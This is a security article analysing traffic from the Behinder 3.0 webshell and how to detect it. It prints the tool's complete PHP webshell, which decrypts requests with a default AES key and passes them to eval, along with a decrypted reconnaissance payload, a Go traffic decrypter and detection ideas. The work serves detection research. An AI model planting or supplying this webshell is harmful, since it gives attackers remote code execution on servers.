Some Thoughts on Behinder (冰蝎) 3.0 Traffic Analysis


Background

When the previous article was written, Behinder had not yet been updated to version 3.0. On the eve of HW, Behinder was updated, and after several days of iteration many of its features are gradually being refined. This article again analyses Behinder and its interaction with the server side from the traffic perspective, in the hope of offering a starting point for others to analyse and research the tool.

Code Analysis

The Behinder server-side code received some updates, chiefly the removal of the plaintext key-negotiation step. Taking PHP as the example, the code is as follows:

```php
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";   // pre-shared key; 2.x negotiated it in plaintext
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    // fallback without openssl: base64-decode, then repeating-key XOR
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    // "AES128" is AES-128-CBC; no IV is passed, so PHP uses an all-zero IV
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
```

The key line is: $key="e45e329feb5d925b";

Replacing the dynamically negotiated key with a pre-shared key prevents analysts from reading the key straight out of the traffic and using it to decrypt the session.

Data Capture

The relevant traffic can be captured with Wireshark. Analysis shows that the new Behinder submits data to the server with POST rather than GET; Wireshark's Follow Stream tool can be used to follow the relevant data.


Decrypting the Encrypted Request Data

Assuming the encryption key is known to be Behinder's default key, e45e329feb5d925b, an online AES decryption tool[1] can quickly decrypt the data.

A Base64 decoding tool[2] can then decode the decrypted data to reveal Behinder's actual intent. Taking the display of phpinfo() information as an example, after decryption and decoding the code Behinder actually sends is as follows:

```php
error_reporting(0);
function main($whatever) {
    ob_start();
    phpinfo();
    $info = ob_get_contents();
    ob_end_clean();
    $driveList ="";
    if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
    {
        // enumerate drive letters A: to Z:
        for($i=65;$i<=90;$i++)
        {
            $drive=chr($i).':/';
            file_exists($drive) ? $driveList=$driveList.$drive.";":'';
        }
    }
    else
    {
        $driveList="/";
    }
    $currentPath=getcwd();
    //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
    $osInfo=PHP_OS;
    $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
    //echo json_encode($result);
    session_start();
    $key=$_SESSION['k'];
    //echo json_encode($result);
    //echo openssl_encrypt(json_encode($result), "AES128", $key);
    // response: JSON with base64 fields, encrypted with the session key
    echo encrypt(json_encode($result), $key);
}
function encrypt($data,$key){
    if(!extension_loaded('openssl')) {
        // same repeating-key XOR as the server's non-openssl branch
        for($i=0;$i<strlen($data);$i++) {
            $data[$i] = $data[$i]^$key[$i+1&15];
        }
        return $data;
    } else {
        return openssl_encrypt($data, "AES128", $key);
    }
}
// padding value; the page does not reproduce it
$whatever="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";
main($whatever);
```

The $whatever variable serves as padding, so that the Content-Length field of the HTTP header cannot be used as a side-channel feature for identifying and analysing the tool.

Decrypting the Encrypted Response Data

Taking whoami run from the command line as an example, the response data is likewise encrypted with the key; decrypting it with the same key gives the following:


After Base64 decoding, the actual content is:

nt authority\system

Analysis of the Encrypted Request Traffic

When partially similar data is encrypted with the same key, parts of the encrypted output stay the same. Capturing Behinder's phpinfo() traffic twice in succession showed that ciphertexts encrypted with the same key are partly identical! As shown below:

Encrypted traffic 1:

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

Encrypted traffic 2:

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

Interested readers can decrypt these two captures with the tools mentioned above and compare them. The comparison shows that, when data is encrypted with the same key, the differences in the ciphertext stem mainly from the differing padding content of the $whatever variable.

Some Thoughts on Feature Analysis of the New Behinder Version

The new version of Behinder adds many features, and compared with V2 the detection method has become more complex, but that does not mean Behinder has become an invincible tool. In my understanding, one of the most important angles for analysing Behinder is to try to obtain the key Behinder uses to encrypt its data: with the key in hand, any data encrypted with it can always be decrypted.

For the new version of Behinder, after thought and discussion, we have for now come up with the following approaches as references for follow-up research:

1. Continuously monitor the contents of files under key paths on the server; if sensitive data such as $key="e45e329feb5d925b"; or e45e329feb5d925b is found, it can be combined with the traffic to decrypt the relevant data for further analysis.

2. Build a key dictionary and decrypt the encrypted traffic in real time, extracting content with genuine semantics.

3. Until Behinder starts randomising the UA field, the UA can still be considered a lightweight feature for a preliminary identification of Behinder. Awkwardly, analysis shows a new feature value has already appeared, such as: Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1
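To make approaches 1 and 2 concrete, and to show why the two phpinfo() captures above share ciphertext, here is an added Go example (not Behinder's code and not from the article) that reproduces the server's AES128 path: PHP's openssl_encrypt with "AES128" and no IV is AES-128-CBC under an all-zero IV, so with a fixed key the ciphertext is deterministic, matching plaintext prefixes give matching leading blocks, and a captured body decrypts with the default key or any key pulled from a dictionary. The request layout "func|base64(php)" follows the server's explode('|', ...); the sample PHP, the "run" function name and the non-default candidate keys are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
)

// PHP's openssl_encrypt($data, "AES128", $key) with no IV is AES-128-CBC with an
// all-zero IV, PKCS#7 padding and base64 output (PHP only warns about the empty IV).
var zeroIV = make([]byte, aes.BlockSize)
// EncryptLikeServer mirrors the server's encrypt(); used here only to build sample
// traffic. Fixed key + zero IV makes CBC deterministic, hence the shared prefixes.
func EncryptLikeServer(plain string, block cipher.Block) string {
	n := aes.BlockSize - len(plain)%aes.BlockSize
	p := append([]byte(plain), bytes.Repeat([]byte{byte(n)}, n)...)
	cipher.NewCBCEncrypter(block, zeroIV).CryptBlocks(p, p)
	return base64.StdEncoding.EncodeToString(p)
}

// DecryptBody reverses it; with a wrong key the PKCS#7 check almost always fails.
func DecryptBody(b64, key string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	block, kerr := aes.NewCipher([]byte(key))
	if err != nil || kerr != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("not a well-formed AES-128-CBC body")
	}
	cipher.NewCBCDecrypter(block, zeroIV).CryptBlocks(ct, ct)
	n := int(ct[len(ct)-1])
	if n == 0 || n > aes.BlockSize || !bytes.HasSuffix(ct, bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding (wrong key?)")
	}
	return ct[:len(ct)-n], nil
}
// TryKeys is the key-dictionary idea from the text: decrypt with each candidate,
// base64-decode the params after "func|" and accept the first that reads like PHP.
func TryKeys(b64 string, keys []string) (string, []byte, bool) {
	for _, k := range keys {
		pt, err := DecryptBody(b64, k)
		if i := bytes.IndexByte(pt, '|'); err == nil && i >= 0 {
			code, err := base64.StdEncoding.DecodeString(string(pt[i+1:]))
			if err == nil && bytes.HasPrefix(code, []byte("error_reporting(0);")) {
				return k, code, true
			}
		}
	}
	return "", nil, false
}
```

Feed DecryptBody or TryKeys the base64 body taken from Wireshark's Follow Stream; a wrong key is rejected by the padding check before any content check runs.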

References

[1] Online AES decryption tool: http://tools.bugscaner.com/cryptoaes/
[2] Base64 decoding tool: http://tool.chinaz.com/Tools/Base64.aspx

